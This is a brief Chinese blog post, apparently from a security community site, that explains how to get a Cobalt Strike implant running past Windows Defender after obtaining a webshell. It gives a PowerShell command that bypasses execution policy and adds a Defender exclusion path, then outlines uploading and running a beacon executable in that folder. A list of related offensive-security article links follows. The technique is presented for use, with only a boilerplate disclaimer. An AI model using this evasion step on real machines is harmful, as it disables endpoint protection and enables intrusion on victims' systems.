不会写免杀也能轻松过defender上线CS

简介: 不会写免杀也能轻松过defender上线CS

免责声明



本文仅用于技术讨论与学习,利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。

只供对已授权的目标使用测试,对未授权目标的测试作者不承担责任,均由使用本人自行承担。


文章正文


偶然看到了通过powershell操作defender来添加排除项

https://docs.microsoft.com/en-us/powershell/module/defender/?view=windowsserver2019-ps

所以就有了这个场景:

假设我们拿到目标机器的webshell,对方开着Windows defender,在不会写免杀的情况下,上线CS:

添加排除项:

powershell -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath "C:\justtest"

CS生成一个普通的exe马:

上传到justtest目录:

运行:

上线:


相关文章
|
10月前
|
算法 安全 Java
CobaltStrike windows7 无法上线
CobaltStrike windows7 无法上线
198 0
|
安全 API 数据安全/隐私保护
Cobaltstrike4.0——记一次上头的powershell上线分析(三)
Cobaltstrike4.0——记一次上头的powershell上线分析
267 0
|
安全 Linux Shell
【内网安全-CS】Cobalt Strike启动运行&上线方法&插件
【内网安全-CS】Cobalt Strike启动运行&上线方法&插件
1625 0
【内网安全-CS】Cobalt Strike启动运行&上线方法&插件
|
12月前
|
安全 Windows
Windows提权/杀软进程在线对比
Windows提权/杀软进程在线对比
371 0
Windows提权/杀软进程在线对比
|
4月前
|
安全 关系型数据库 MySQL
应急加固初试(windows sever 2008)
应急加固初试(windows sever 2008)
67 1
CS-Powershell免杀-过卡巴等杀软上线
CS-Powershell免杀-过卡巴等杀软上线
489 0
|
Java API C#
Cobaltstrike4.0——记一次上头的powershell上线分析(一)
Cobaltstrike4.0——记一次上头的powershell上线分析
494 0
|
存储 安全 API
Cobaltstrike4.0——记一次上头的powershell上线分析(二)
Cobaltstrike4.0——记一次上头的powershell上线分析
363 0
|
安全 Windows
报告称Windows7不安全 管理员权限是罪魁祸首
3月30日消息,据国外媒体报道,企业安全产品开发商BeyondTrust周一在报告中称,禁用Windows 7的管理员权限,90%的“中高”级别漏洞都可以被避免。 报告称,取消Windows 7管理员权限,去年发现的全部Office漏洞都可以被避免,94%的IE漏洞可以避免,100%的IE 8漏洞可以避免,64%的所有微软产品漏洞可以避免。
720 0